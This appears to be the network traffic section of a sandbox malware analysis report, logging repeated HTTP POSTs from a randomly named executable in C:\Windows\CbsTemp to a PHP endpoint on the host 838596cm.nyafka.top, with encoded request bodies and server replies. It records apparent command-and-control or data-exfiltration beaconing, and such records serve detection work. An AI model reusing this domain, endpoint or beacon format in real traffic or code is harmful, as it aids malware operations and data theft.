                                                                                                          Jan 8, 2025 17:13:33.949740887 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:34.110300064 CET809INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:34 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6G%2BFQFkHJRcj9t%2F2heVtdWoA%2F6NkZ5kSfs7qy869QL6loMWUnuUXhMcAE9qsxS%2ByjPVOcJodDZi94Nm3U3Hsvas1j9vSmKQyA4cCTZ48xp6ZX5Pb8%2FxtbjIa4681BL2pD9kuIdw3"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79bee875729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3233&min_rtt=1942&rtt_var=3311&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=118960&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          46192.168.2.550029104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:34.246028900 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:34.598480940 CET2532OUTData Raw: 55 55 5e 50 59 5e 53 5b 5e 5f 57 54 56 5b 59 59 57 51 58 5a 50 5d 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU^PY^S[^_WTV[YYWQXZP]V_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _((+]0 "=5[/7 >.)**$*V<")Y<\5-8-/#_&'P-3
                                                                                                          Jan 8, 2025 17:13:34.699580908 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:34.935005903 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:34 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zy3eot1q908Ao7aFkTAIvLtTPLQ2mXhJMHM3tvltjvXsoygtSm7nsQiOVyWasTRGAqd6PAa272GJaYOFMnwicwcPA%2FSMfl9YLLTA8oIBBg9UOMiFsR8i5kRP84p1uIlyo%2BA8mC9K"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79c39d4b727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5001&min_rtt=2004&rtt_var=6746&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=56188&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          47192.168.2.550030104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:35.310847998 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:35.661081076 CET2528OUTData Raw: 50 51 5e 5e 59 5b 56 5a 5e 5f 57 54 56 5e 59 5f 57 57 58 5c 50 55 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PQ^^Y[VZ^_WTV^Y_WWX\PUVP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +7%#Z?>&;$<=1_**'+*S+2^>Y' .49#_&'P-3
                                                                                                          Jan 8, 2025 17:13:35.778414965 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:36.029388905 CET813INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:35 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4UVkXcsNmHPI5chSNU4Z1ecVz59G%2FqaE%2B%2BM7AUUw0SUsMeE0iROo%2B7Q4VQ41a5IJ8KNMMMOBNU0%2BcHf3gNw%2BVLXDEXe8faKFDfkCMTqxum2HrwT4pIOyDPXuoh5ndx%2F6ZPIUuEbr"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79ca4c5cc34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2865&min_rtt=1570&rtt_var=3180&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=122329&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          48192.168.2.550031104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:36.208878994 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:36.567085028 CET2532OUTData Raw: 55 56 5e 55 5c 5d 56 5a 5e 5f 57 54 56 5c 59 52 57 54 58 59 50 58 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UV^U\]VZ^_WTV\YRWTXYPXVQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ?(3X0#[>-2;]=>1]))';)!;(?!-(.#_&'P-/
                                                                                                          Jan 8, 2025 17:13:36.654782057 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:36.910579920 CET801INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:36 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRJHjO%2FTsPFkK801bAeMq2n47loAWwnkyBt1kA7iAAY4ukENL9A9VEyNamwSFfOU3r3WnBmJphwthmwHT1tFYoofNL4jqH2kiq10QSfLacTKtgYbNR4lMDLLtIQZwBUePmPBuC3W"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79cfc885729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2567&min_rtt=2048&rtt_var=1807&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=235218&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          49192.168.2.550032104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:37.047214985 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:37.394975901 CET2532OUTData Raw: 50 57 5e 52 59 5d 56 53 5e 5f 57 54 56 58 59 5c 57 5f 58 59 50 5a 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW^RY]VS^_WTVXY\W_XYPZVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X+;?\'.^=[*/+>=>*!Z'=(10>]5.+:#_&'P-?
                                                                                                          Jan 8, 2025 17:13:37.521162987 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:37.734548092 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:37.763859987 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:37 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rJHAbGikklIUtZCCr61%2BT4jqpQpB1p1VbNEc4a6C%2BJPmZhZ5fW6Z0eJ376IXGl9BchC3zNVgzvAXtOKPBTsQvyUtFl8VzzkjwJm7vH%2FhtsliLWaioQ4GlYDlPoEWOqJ2WxU5UpnK"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79d53ed243b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3973&min_rtt=2158&rtt_var=4440&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=87508&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          50192.168.2.550033104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:38.008079052 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          51192.168.2.550034104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:38.113250971 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1836
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:38.457668066 CET1836OUTData Raw: 55 56 5e 56 59 5a 53 5b 5e 5f 57 54 56 5e 59 5d 57 56 58 5f 50 5d 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UV^VYZS[^_WTV^Y]WVX_P]VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ [(+0 "^>8$Z=-6)1X&8-("(>4Y"^:#_&'P-
                                                                                                          Jan 8, 2025 17:13:38.560874939 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:38.794789076 CET950INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:38 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uAeE%2FMeut01QmfIukDbovC8EpmsPl5yF%2B0L1OLzGnqyTZnf4QM8Ib8Fg2spA355MAKKXP3NlLkgAyKwiL5JwkXkexmSP40UQegCTEd%2Br8n8MlMeYn%2Bng8iC5CzLI8Rsm6XmtkYg7"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79dbbfaa727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4662&min_rtt=2038&rtt_var=6012&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2185&delivery_rate=63392&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 54 24 2d 0e 13 20 3b 0c 09 2b 2a 09 58 2a 20 22 58 2d 5f 23 00 32 27 3f 01 32 05 33 01 34 11 3a 07 2b 5e 31 12 26 35 2f 09 2b 2b 20 5c 04 1f 24 5e 3c 38 2d 52 3e 2f 2e 59 24 20 22 01 26 23 0a 5b 26 03 05 59 27 07 25 0c 20 3a 33 13 38 1d 3e 56 2e 38 24 5b 2a 37 37 02 27 14 2f 50 0f 10 38 51 3a 39 2c 02 36 31 2e 55 35 23 3f 10 22 35 3f 02 2a 2d 0d 18 35 3f 21 5f 24 23 17 57 23 22 3f 57 24 55 2b 14 28 31 01 0c 2b 09 24 55 2c 02 2c 49 02 3f 58 52 0d 0a
                                                                                                          Data Ascii: 98$T$- ;+*X* "X-_#2'?234:+^1&5/++ \$^<8-R>/.Y$ "&#[&Y'% :38>V.8$[*77'/P8Q:9,61.U5#?"5?*-5?!_$#W#"?W$U+(1+$U,,I?XR
                                                                                                          Jan 8, 2025 17:13:38.882110119 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          52192.168.2.550035104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:38.264816999 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:38.613781929 CET2532OUTData Raw: 55 51 5b 52 59 58 53 5c 5e 5f 57 54 56 5c 59 5b 57 54 58 53 50 5b 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ[RYXS\^_WTV\Y[WTXSP[V\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ (<'9*.5].$#[>=!*;$+<1 ),8".+]-/#_&'P-/
                                                                                                          Jan 8, 2025 17:13:38.735891104 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:38.965667963 CET799INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:38 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tq2Dys%2FCW10%2FoOOSG3yEd5DbLT0FRTtvwy6n2z145tA552GXNelEWlUggkP5bsxpqb3HjLkvuIj1IfCVgPiSHaq0iOW2Y4Kk5V9gHdbyRtZ58B08f2Y59%2Bpg1i39VIbuqofzdV2T"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79dcc91dc34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4292&min_rtt=1471&rtt_var=6195&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=60716&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:13:39.057888985 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          53192.168.2.550036104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:39.187189102 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:39.535696983 CET2532OUTData Raw: 50 56 5e 53 59 5c 53 5c 5e 5f 57 54 56 5b 59 5e 57 54 58 52 50 5d 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV^SY\S\^_WTV[Y^WTXRP]VX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Y<?]$U%==!Z,43Y>>;9Y39+"<(?;!\-/#_&'P-3
                                                                                                          Jan 8, 2025 17:13:39.630831957 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:39.872028112 CET808INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:39 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XYGa2wbZMTlLm8ST4EopMHce61Tl3R3dA4aeBHBfKe9xvOQopvOGpR%2F1RSEN%2Bi%2F5dMWp9kH8Zms%2F9HUi0I50roLbF3vMGJSxipf%2FCL2iwReBH8rq28IZWKKnaCJ2JzanSvhwvMuK"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79e26c9543b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5116&min_rtt=1575&rtt_var=7673&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=48822&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          54192.168.2.550037104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:40.060520887 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:40.410835981 CET2532OUTData Raw: 55 54 5e 56 59 59 53 5b 5e 5f 57 54 56 57 59 58 57 50 58 5b 50 55 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT^VYYS[^_WTVWYXWPX[PUV\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ?8($==>83=-=>2$(%<1 )?7!.#_&'P-
                                                                                                          Jan 8, 2025 17:13:40.514039993 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:40.726475954 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:40.767915964 CET809INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:40 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qi71mPqiqKmXX%2F2HHFtM6dMsP4SS7tWI8sPnIzCVZyvqJ2yFDTWABE5ieJanH6seQ%2FjNmlV6apTWLXH9E2jrFibQLYUkV%2FsxhCljBt211GRFORYkFWwVZ%2F8nkB%2BgZ0smkkLWUl5h"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79e7eb5c729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8586&min_rtt=1939&rtt_var=14022&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=26488&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          55192.168.2.550038104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
